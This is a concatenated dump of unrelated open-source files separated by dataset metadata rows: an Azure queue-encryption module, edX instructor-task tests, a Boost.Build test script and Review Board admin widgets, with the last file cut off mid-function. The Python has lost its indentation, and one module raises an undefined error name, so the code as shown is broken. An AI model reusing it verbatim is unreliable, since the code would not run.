#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import sys
sampleText = "Hello World!"
if __name__=="__main__":
args = sys.argv[1:]
if args[0] == "1":
# print sample text to stderr
sys.stdout.write(sampleText)
elif args[0] == "2":
# print sample text to stderr
sys.stderr.write(sampleText)
# Add any other helper programs here, with different values for args[0]
pass
| apache-2.0 | -7,826,313,136,662,599,000 | 33 | 73 | 0.73975 | false |
dstrockis/outlook-autocategories | lib/azure/storage/queue/_encryption.py | 1 | 7544 | #-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from azure.common import (
AzureException,
)
from .._constants import (
_ENCRYPTION_PROTOCOL_V1,
)
from .._encryption import (
_generate_encryption_data_dict,
_dict_to_encryption_data,
_generate_AES_CBC_cipher,
_validate_and_unwrap_cek,
_EncryptionAlgorithm,
)
from json import (
dumps,
loads,
)
from base64 import(
b64encode,
b64decode,
)
from .._error import(
_ERROR_UNSUPPORTED_ENCRYPTION_VERSION,
_ERROR_DECRYPTION_FAILURE,
_ERROR_DATA_NOT_ENCRYPTED,
_ERROR_UNSUPPORTED_ENCRYPTION_ALGORITHM,
_validate_not_none,
_validate_key_encryption_key_wrap,
_validate_key_encryption_key_unwrap,
_validate_encryption_protocol_version,
_validate_kek_id,
)
from .._common_conversion import (
_encode_base64,
_decode_base64_to_bytes
)
from cryptography.hazmat.primitives.padding import PKCS7
import os
def _encrypt_queue_message(message, key_encryption_key):
'''
Encrypts the given plain text message using AES256 in CBC mode with 128 bit padding.
Wraps the generated content-encryption-key using the user-provided key-encryption-key (kek).
Returns a json-formatted string containing the encrypted message and the encryption metadata.
:param object message:
The plain text messge to be encrypted.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
wrap_key(key)--wraps the specified key using an algorithm of the user's choice.
get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key.
get_kid()--returns a string key id for this key-encryption-key.
:return: A json-formatted string containing the encrypted message and the encryption metadata.
:rtype: str
'''
_validate_not_none('message', message)
_validate_not_none('key_encryption_key', key_encryption_key)
_validate_key_encryption_key_wrap(key_encryption_key)
# AES256 uses 256 bit (32 byte) keys and always with 16 byte blocks
content_encryption_key = os.urandom(32)
initialization_vector = os.urandom(16)
# Queue encoding functions all return unicode strings, and encryption should
# operate on binary strings.
message = message.encode('utf-8')
cipher = _generate_AES_CBC_cipher(content_encryption_key, initialization_vector)
# PKCS7 with 16 byte blocks ensures compatibility with AES.
padder = PKCS7(128).padder()
padded_data = padder.update(message) + padder.finalize()
# Encrypt the data.
encryptor = cipher.encryptor()
encrypted_data = encryptor.update(padded_data) + encryptor.finalize()
# Build the dictionary structure.
queue_message = {}
queue_message['EncryptedMessageContents'] = _encode_base64(encrypted_data)
queue_message['EncryptionData'] = _generate_encryption_data_dict(key_encryption_key,
content_encryption_key,
initialization_vector)
return dumps(queue_message)
def _decrypt_queue_message(message, require_encryption, key_encryption_key, resolver):
'''
Returns the decrypted message contents from an EncryptedQueueMessage.
If no encryption metadata is present, will return the unaltered message.
:param str message:
The JSON formatted QueueEncryptedMessage contents with all associated metadata.
:param bool require_encryption:
If set, will enforce that the retrieved messages are encrypted and decrypt them.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
unwrap_key(key, algorithm)--returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
get_kid()--returns a string key id for this key-encryption-key.
:param function resolver(kid):
The user-provided key resolver. Uses the kid string to return a key-encryption-key implementing the interface defined above.
:return: The plain text message from the queue message.
:rtype: str
'''
try:
message = loads(message)
encryption_data = _dict_to_encryption_data(message['EncryptionData'])
decoded_data = _decode_base64_to_bytes(message['EncryptedMessageContents'])
except (KeyError, ValueError) as e:
# Message was not json formatted and so was not encrypted
# or the user provided a json formatted message.
if require_encryption:
raise ValueError(_ERROR_MESSAGE_NOT_ENCRYPTED)
else:
return message
try:
return _decrypt(decoded_data, encryption_data, key_encryption_key, resolver).decode('utf-8')
except Exception as e:
raise AzureException(_ERROR_DECRYPTION_FAILURE)
def _decrypt(message, encryption_data, key_encryption_key=None, resolver=None):
'''
Decrypts the given ciphertext using AES256 in CBC mode with 128 bit padding.
Unwraps the content-encryption-key using the user-provided or resolved key-encryption-key (kek). Returns the original plaintex.
:param str message:
The ciphertext to be decrypted.
:param _EncryptionData encryption_data:
The metadata associated with this ciphertext.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
unwrap_key(key, algorithm)--returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
get_kid()--returns a string key id for this key-encryption-key.
:param function resolver(kid):
The user-provided key resolver. Uses the kid string to return a key-encryption-key implementing the interface defined above.
:return: The decrypted plaintext.
:rtype: str
'''
_validate_not_none('message', message)
content_encryption_key = _validate_and_unwrap_cek(encryption_data, key_encryption_key, resolver)
if not ( _EncryptionAlgorithm.AES_CBC_256 == encryption_data.encryption_agent.encryption_algorithm):
raise ValueError(_ERROR_UNSUPPORTED_ENCRYPTION_ALGORITHM)
cipher = _generate_AES_CBC_cipher(content_encryption_key, encryption_data.content_encryption_IV)
#decrypt data
decrypted_data = message
decryptor = cipher.decryptor()
decrypted_data = (decryptor.update(decrypted_data) + decryptor.finalize())
#unpad data
unpadder = PKCS7(128).unpadder()
decrypted_data = (unpadder.update(decrypted_data) + unpadder.finalize())
return decrypted_data | apache-2.0 | -5,437,619,816,642,808,000 | 41.618497 | 132 | 0.678685 | false |
olexiim/edx-platform | lms/djangoapps/instructor_task/tests/test_views.py | 204 | 17817 |
"""
Test for LMS instructor background task views.
"""
import json
from celery.states import SUCCESS, FAILURE, REVOKED, PENDING
from mock import Mock, patch
from django.utils.datastructures import MultiValueDict
from instructor_task.models import PROGRESS
from instructor_task.tests.test_base import (InstructorTaskTestCase,
TEST_FAILURE_MESSAGE,
TEST_FAILURE_EXCEPTION)
from instructor_task.views import instructor_task_status, get_task_completion_info
class InstructorTaskReportTest(InstructorTaskTestCase):
"""
Tests view methods that involve the reporting of status for background tasks.
"""
def _get_instructor_task_status(self, task_id):
"""Returns status corresponding to task_id via api method."""
request = Mock()
request.REQUEST = {'task_id': task_id}
return instructor_task_status(request)
def test_instructor_task_status(self):
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
def test_missing_instructor_task_status(self):
task_id = "missing_id"
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output, {})
def test_instructor_task_status_list(self):
# Fetch status for existing tasks by arg list, as if called from ajax.
# Note that ajax does something funny with the marshalling of
# list data, so the key value has "[]" appended to it.
task_ids = [(self._create_failure_entry()).task_id for _ in range(1, 5)]
request = Mock()
request.REQUEST = MultiValueDict({'task_ids[]': task_ids})
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(len(output), len(task_ids))
for task_id in task_ids:
self.assertEquals(output[task_id]['task_id'], task_id)
def test_get_status_from_failure(self):
# get status for a task that has already failed
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], TEST_FAILURE_MESSAGE)
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': TEST_FAILURE_EXCEPTION,
'message': TEST_FAILURE_MESSAGE,
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_success(self):
# get status for a task that has already succeeded
instructor_task = self._create_success_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'total': 5,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_legacy_success(self):
# get status for a task that had already succeeded, back at a time
# when 'updated' was used instead of the preferred 'succeeded'.
legacy_progress = {
'attempted': 3,
'updated': 2,
'total': 5,
'action_name': 'rescored',
}
instructor_task = self._create_entry(task_state=SUCCESS, task_output=legacy_progress)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
self.assertEquals(output['task_progress'], legacy_progress)
def _create_email_subtask_entry(self, total=5, attempted=3, succeeded=2, skipped=0, task_state=PROGRESS):
"""Create an InstructorTask with subtask defined and email argument."""
progress = {'attempted': attempted,
'succeeded': succeeded,
'skipped': skipped,
'total': total,
'action_name': 'emailed',
}
instructor_task = self._create_entry(task_state=task_state, task_output=progress)
instructor_task.subtasks = {}
instructor_task.task_input = json.dumps({'email_id': 134})
instructor_task.save()
return instructor_task
def test_get_status_from_subtasks(self):
# get status for a task that is in progress, with updates
# from subtasks.
instructor_task = self._create_email_subtask_entry(skipped=1)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Progress: emailed 2 of 3 so far (skipping 1) (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'skipped': 1,
'total': 5,
'action_name': 'emailed',
}
self.assertEquals(output['task_progress'], expected_progress)
def _test_get_status_from_result(self, task_id, mock_result=None):
"""
Provides mock result to caller of instructor_task_status, and returns resulting output.
"""
with patch('celery.result.AsyncResult.__new__') as mock_result_ctor:
mock_result_ctor.return_value = mock_result
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
return output
def test_get_status_to_pending(self):
# get status for a task that hasn't begun to run yet
instructor_task = self._create_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PENDING
output = self._test_get_status_from_result(task_id, mock_result)
for key in ['message', 'succeeded', 'task_progress']:
self.assertTrue(key not in output)
self.assertEquals(output['task_state'], 'PENDING')
self.assertTrue(output['in_progress'])
def test_update_progress_to_progress(self):
# view task entry for task in progress
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PROGRESS
mock_result.result = {
'attempted': 5,
'succeeded': 4,
'total': 10,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Progress: rescored 4 of 5 so far (out of 10)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
self.assertEquals(output['task_progress'], mock_result.result)
def test_update_progress_to_failure(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = FAILURE
mock_result.result = NotImplementedError("This task later failed.")
mock_result.traceback = "random traceback"
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "This task later failed.")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': 'NotImplementedError',
'message': "This task later failed.",
'traceback': "random traceback",
}
self.assertEquals(output['task_progress'], expected_progress)
def test_update_progress_to_revoked(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = REVOKED
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Task revoked before running")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], REVOKED)
self.assertFalse(output['in_progress'])
expected_progress = {'message': "Task revoked before running"}
self.assertEquals(output['task_progress'], expected_progress)
def _get_output_for_task_success(self, attempted, succeeded, total, student=None):
"""returns the task_id and the result returned by instructor_task_status()."""
# view task entry for task in progress
instructor_task = self._create_progress_entry(student)
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = SUCCESS
mock_result.result = {
'attempted': attempted,
'succeeded': succeeded,
'total': total,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
return output
def _get_email_output_for_task_success(self, attempted, succeeded, total, skipped=0):
"""returns the result returned by instructor_task_status()."""
instructor_task = self._create_email_subtask_entry(
total=total,
attempted=attempted,
succeeded=succeeded,
skipped=skipped,
task_state=SUCCESS,
)
return self._test_get_status_from_result(instructor_task.task_id)
def test_update_progress_to_success(self):
output = self._get_output_for_task_success(10, 8, 10)
self.assertEquals(output['message'], "Problem rescored for 8 of 10 students")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 10,
'succeeded': 8,
'total': 10,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_success_messages(self):
output = self._get_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any students with submissions to be rescored (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Problem failed to be rescored for any of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 9 students (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Problem successfully rescored for 10 students")
self.assertTrue(output['succeeded'])
output = self._get_output_for_task_success(0, 0, 1, student=self.student)
self.assertTrue("Unable to find submission to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 0, 1, student=self.student)
self.assertTrue("Problem failed to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 1, 1, student=self.student)
self.assertTrue("Problem successfully rescored for student" in output['message'])
self.assertTrue(output['succeeded'])
def test_email_success_messages(self):
output = self._get_email_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients ")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients")
self.assertTrue(output['succeeded'])
output = self._get_email_output_for_task_success(0, 0, 10, skipped=3)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10, skipped=3)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10, skipped=3)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients (skipping 3)")
self.assertTrue(output['succeeded'])
def test_get_info_for_queuing_task(self):
# get status for a task that is still running:
instructor_task = self._create_entry()
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_missing_output(self):
# check for missing task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = None
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_broken_output(self):
# check for non-JSON task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No parsable status information available")
def test_get_info_for_empty_output(self):
# check for JSON task_output with missing keys
instructor_task = self._create_success_entry()
instructor_task.task_output = "{}"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No progress status information available")
def test_get_info_for_broken_input(self):
# check for non-JSON task_input, but then just ignore it
instructor_task = self._create_success_entry()
instructor_task.task_input = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "Status: rescored 2 of 3 (out of 5)")
| agpl-3.0 | 4,168,649,275,704,459,000 | 45.398438 | 118 | 0.639053 | false |
yxcoin/yxcoin | src/boost_1_55_0/tools/build/v2/test/library_chain.py | 44 | 3427 | #!/usr/bin/python
# Copyright 2003, 2004, 2005, 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Test that a chain of libraries works ok, no matter if we use static or shared
# linking.
import BoostBuild
import os
import string
t = BoostBuild.Tester(use_test_config=False)
# Stage the binary, so that it will be relinked without hardcode-dll-paths.
# That will check that we pass correct -rpath-link, even if not passing -rpath.
t.write("jamfile.jam", """\
stage dist : main ;
exe main : main.cpp b ;
""")
t.write("main.cpp", """\
void foo();
int main() { foo(); }
""")
t.write("jamroot.jam", "")
t.write("a/a.cpp", """\
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
gee() {}
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
geek() {}
""")
t.write("a/jamfile.jam", "lib a : a.cpp ;")
t.write("b/b.cpp", """\
void geek();
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
foo() { geek(); }
""")
t.write("b/jamfile.jam", "lib b : b.cpp ../a//a ;")
t.run_build_system(["-d2"], stderr=None)
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.run_build_system(["link=static"])
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Check that <library> works for static linking.
t.write("b/jamfile.jam", "lib b : b.cpp : <library>../a//a ;")
t.run_build_system(["link=static"])
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.write("b/jamfile.jam", "lib b : b.cpp ../a//a/<link>shared : <link>static ;")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Test that putting a library in sources of a searched library works.
t.write("jamfile.jam", """\
exe main : main.cpp png ;
lib png : z : <name>png ;
lib z : : <name>zzz ;
""")
t.run_build_system(["-a", "-d+2"], status=None, stderr=None)
# Try to find the "zzz" string either in response file (for Windows compilers),
# or in the standard output.
rsp = t.adjust_names("bin/$toolset/debug/main.exe.rsp")[0]
if os.path.exists(rsp) and ( string.find(open(rsp).read(), "zzz") != -1 ):
pass
elif string.find(t.stdout(), "zzz") != -1:
pass
else:
t.fail_test(1)
# Test main -> libb -> liba chain in the case where liba is a file and not a
# Boost.Build target.
t.rm(".")
t.write("jamroot.jam", "")
t.write("a/jamfile.jam", """\
lib a : a.cpp ;
install dist : a ;
""")
t.write("a/a.cpp", """\
#if defined(_WIN32)
__declspec(dllexport)
#endif
void a() {}
""")
t.run_build_system(subdir="a")
t.expect_addition("a/dist/a.dll")
if ( os.name == 'nt' or os.uname()[0].lower().startswith('cygwin') ) and \
BoostBuild.get_toolset() != 'gcc':
# This is a Windows import library -- we know the exact name.
file = "a/dist/a.lib"
else:
file = t.adjust_names("a/dist/a.dll")[0]
t.write("b/jamfile.jam", "lib b : b.cpp ../%s ;" % file)
t.write("b/b.cpp", """\
#if defined(_WIN32)
__declspec(dllimport)
#endif
void a();
#if defined(_WIN32)
__declspec(dllexport)
#endif
void b() { a(); }
""")
t.write("jamroot.jam", "exe main : main.cpp b//b ;")
t.write("main.cpp", """\
#if defined(_WIN32)
__declspec(dllimport)
#endif
void b();
int main() { b(); }
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.cleanup()
| mit | -2,478,502,187,285,547,000 | 21.546053 | 81 | 0.634958 | false |
brennie/reviewboard | reviewboard/admin/widgets.py | 7 | 17971 | from __future__ import unicode_literals
import datetime
import logging
import re
import time
from django.core.cache import cache
from django.contrib.auth.models import User
from django.db.models.aggregates import Count
from django.db.models.signals import post_save, post_delete
from django.template.context import RequestContext
from django.template.loader import render_to_string
from django.utils import six, timezone
from django.utils.translation import ugettext_lazy as _
from djblets.cache.backend import cache_memoize
from reviewboard.admin.cache_stats import get_cache_stats
from reviewboard.attachments.models import FileAttachment
from reviewboard.changedescs.models import ChangeDescription
from reviewboard.diffviewer.models import DiffSet
from reviewboard.reviews.models import (ReviewRequest, Group,
Comment, Review, Screenshot,
ReviewRequestDraft)
from reviewboard.scmtools.models import Repository
DAYS_TOTAL = 30 # Set the number of days to display in date browsing widgets
NAME_TRANSFORM_RE = re.compile(r'([A-Z])')
primary_widgets = []
secondary_widgets = []
class Widget(object):
"""The base class for an Administration Dashboard widget.
Widgets appear in the Administration Dashboard and can display useful
information on the system, links to other pages, or even fetch data
from external sites.
There are a number of built-in widgets, but extensions can provide their
own.
"""
# Constants
SMALL = 'small'
LARGE = 'large'
# Configuration
widget_id = None
title = None
size = SMALL
template = None
actions = []
has_data = True
cache_data = True
def __init__(self):
"""Initialize the widget."""
self.data = None
self.name = NAME_TRANSFORM_RE.sub(
lambda m: '-%s' % m.group(1).lower(),
self.__class__.__name__)[1:]
def render(self, request):
"""Render the widget.
This will render the HTML for a widget. It takes care of generating
and caching the data, depending on the widget's needs.
"""
if self.has_data and self.data is None:
if self.cache_data:
self.data = cache_memoize(self.generate_cache_key(request),
lambda: self.generate_data(request))
else:
self.data = self.generate_data(request)
return render_to_string('admin/admin_widget.html',
RequestContext(request, {
'widget': self,
}))
def generate_data(self, request):
"""Generate data for the widget.
Widgets should override this to provide extra data to pass to the
template. This will be available in 'widget.data'.
If cache_data is True, this data will be cached for the day.
"""
return {}
def generate_cache_key(self, request):
"""Generate a cache key for this widget's data.
By default, the key takes into account the current day. If the
widget is displaying specific to, for example, the user, this should
be overridden to include that data in the key.
"""
syncnum = get_sync_num()
key = "w-%s-%s-%s-%s" % (self.name,
datetime.date.today(),
request.user.username,
syncnum)
return key
def get_sync_num():
"""Get the sync_num, which is number to sync.
sync_num is number of update and initialized to 1 every day.
"""
KEY = datetime.date.today()
cache.add(KEY, 1)
return cache.get(KEY)
def _increment_sync_num(*args, **kwargs):
"""Increment the sync_num."""
KEY = datetime.date.today()
if cache.get(KEY) is not None:
cache.incr(KEY)
class UserActivityWidget(Widget):
"""User activity widget.
Displays a pie chart of the active application users based on their last
login dates.
"""
widget_id = 'user-activity-widget'
title = _('User Activity')
size = Widget.LARGE
template = 'admin/widgets/w-user-activity.html'
actions = [
{
'url': 'db/auth/user/add/',
'label': _('Add'),
},
{
'url': 'db/auth/user/',
'label': _('Manage Users'),
'classes': 'btn-right',
},
]
def generate_data(self, request):
"""Generate data for the widget."""
now = timezone.now()
users = User.objects
week = datetime.timedelta(days=7)
day = datetime.timedelta(days=1)
month = datetime.timedelta(days=30)
two_months = datetime.timedelta(days=60)
three_months = datetime.timedelta(days=90)
one_day = (now - week, now + day)
seven_days = (now - month, now - week)
thirty_days = (now - two_months, now - month)
sixty_days = (now - three_months, now - two_months)
ninety_days = now - three_months
return {
'now': users.filter(last_login__range=one_day).count(),
'seven_days': users.filter(last_login__range=seven_days).count(),
'thirty_days': users.filter(last_login__range=thirty_days).count(),
'sixty_days': users.filter(last_login__range=sixty_days).count(),
'ninety_days': users.filter(last_login__lte=ninety_days).count(),
'total': users.count()
}
class ReviewRequestStatusesWidget(Widget):
"""Review request statuses widget.
Displays a pie chart showing review request by status.
"""
widget_id = 'review-request-statuses-widget'
title = _('Request Statuses')
template = 'admin/widgets/w-request-statuses.html'
def generate_data(self, request):
"""Generate data for the widget."""
public_requests = ReviewRequest.objects.filter(public=True)
return {
'draft': ReviewRequest.objects.filter(public=False).count(),
'pending': public_requests.filter(status="P").count(),
'discarded': public_requests.filter(status="D").count(),
'submit': public_requests.filter(status="S").count()
}
class RepositoriesWidget(Widget):
"""Shows a list of repositories in the system.
This widget displays a table with the most recent repositories,
their types, and visibility.
"""
MAX_REPOSITORIES = 3
widget_id = 'repositories-widget'
title = _('Repositories')
size = Widget.LARGE
template = 'admin/widgets/w-repositories.html'
actions = [
{
'url': 'db/scmtools/repository/add/',
'label': _('Add'),
},
{
'url': 'db/scmtools/repository/',
'label': _('View All'),
'classes': 'btn-right',
},
]
def generate_data(self, request):
"""Generate data for the widget."""
repos = Repository.objects.accessible(request.user).order_by('-id')
return {
'repositories': repos[:self.MAX_REPOSITORIES]
}
def generate_cache_key(self, request):
"""Generate a cache key for this widget's data."""
syncnum = get_sync_num()
key = "w-%s-%s-%s-%s" % (self.name,
datetime.date.today(),
request.user.username,
syncnum)
return key
class ReviewGroupsWidget(Widget):
"""Review groups widget.
Shows a list of recently created groups.
"""
MAX_GROUPS = 5
widget_id = 'review-groups-widget'
title = _('Review Groups')
template = 'admin/widgets/w-groups.html'
actions = [
{
'url': 'db/reviews/group/',
'label': _('View All'),
'classes': 'btn-right',
},
{
'url': 'db/reviews/group/add/',
'label': _('Add'),
},
]
def generate_data(self, request):
"""Generate data for the widget."""
return {
'groups': Group.objects.all().order_by('-id')[:self.MAX_GROUPS]
}
class ServerCacheWidget(Widget):
"""Cache statistics widget.
Displays a list of memcached statistics, if available.
"""
widget_id = 'server-cache-widget'
title = _('Server Cache')
template = 'admin/widgets/w-server-cache.html'
cache_data = False
def generate_data(self, request):
"""Generate data for the widget."""
uptime = {}
cache_stats = get_cache_stats()
if cache_stats:
for hosts, stats in cache_stats:
if stats['uptime'] > 86400:
uptime['value'] = stats['uptime'] / 60 / 60 / 24
uptime['unit'] = _("days")
elif stats['uptime'] > 3600:
uptime['value'] = stats['uptime'] / 60 / 60
uptime['unit'] = _("hours")
else:
uptime['value'] = stats['uptime'] / 60
uptime['unit'] = _("minutes")
return {
'cache_stats': cache_stats,
'uptime': uptime
}
class NewsWidget(Widget):
"""News widget.
Displays the latest news headlines from reviewboard.org.
"""
widget_id = 'news-widget'
title = _('Review Board News')
template = 'admin/widgets/w-news.html'
actions = [
{
'url': 'https://www.reviewboard.org/news/',
'label': _('More'),
},
{
'label': _('Reload'),
'id': 'reload-news',
},
]
has_data = False
class DatabaseStatsWidget(Widget):
"""Database statistics widget.
Displays a list of totals for several important database tables.
"""
widget_id = 'database-stats-widget'
title = _('Database Stats')
template = 'admin/widgets/w-stats.html'
def generate_data(self, request):
"""Generate data for the widget."""
return {
'count_comments': Comment.objects.all().count(),
'count_reviews': Review.objects.all().count(),
'count_attachments': FileAttachment.objects.all().count(),
'count_reviewdrafts': ReviewRequestDraft.objects.all().count(),
'count_screenshots': Screenshot.objects.all().count(),
'count_diffsets': DiffSet.objects.all().count()
}
class RecentActionsWidget(Widget):
"""Recent actions widget.
Displays a list of recent admin actions to the user.
"""
widget_id = 'recent-actions-widget'
title = _('Recent Actions')
template = 'admin/widgets/w-recent-actions.html'
has_data = False
def dynamic_activity_data(request):
"""Large database acitivity widget helper.
This method serves as a helper for the activity widget, it's used with for
AJAX requests based on date ranges passed to it.
"""
direction = request.GET.get('direction')
range_end = request.GET.get('range_end')
range_start = request.GET.get('range_start')
days_total = DAYS_TOTAL
# Convert the date from the request.
#
# This takes the date from the request in YYYY-MM-DD format and
# converts into a format suitable for QuerySet later on.
if range_end:
range_end = datetime.datetime.fromtimestamp(
time.mktime(time.strptime(range_end, "%Y-%m-%d")))
if range_start:
range_start = datetime.datetime.fromtimestamp(
time.mktime(time.strptime(range_start, "%Y-%m-%d")))
if direction == "next" and range_end:
new_range_start = range_end
new_range_end = \
new_range_start + datetime.timedelta(days=days_total)
elif direction == "prev" and range_start:
new_range_start = range_start - datetime.timedelta(days=days_total)
new_range_end = range_start
elif direction == "same" and range_start and range_end:
new_range_start = range_start
new_range_end = range_end
else:
new_range_end = datetime.datetime.now() + datetime.timedelta(days=1)
new_range_start = new_range_end - datetime.timedelta(days=days_total)
current_tz = timezone.get_current_timezone()
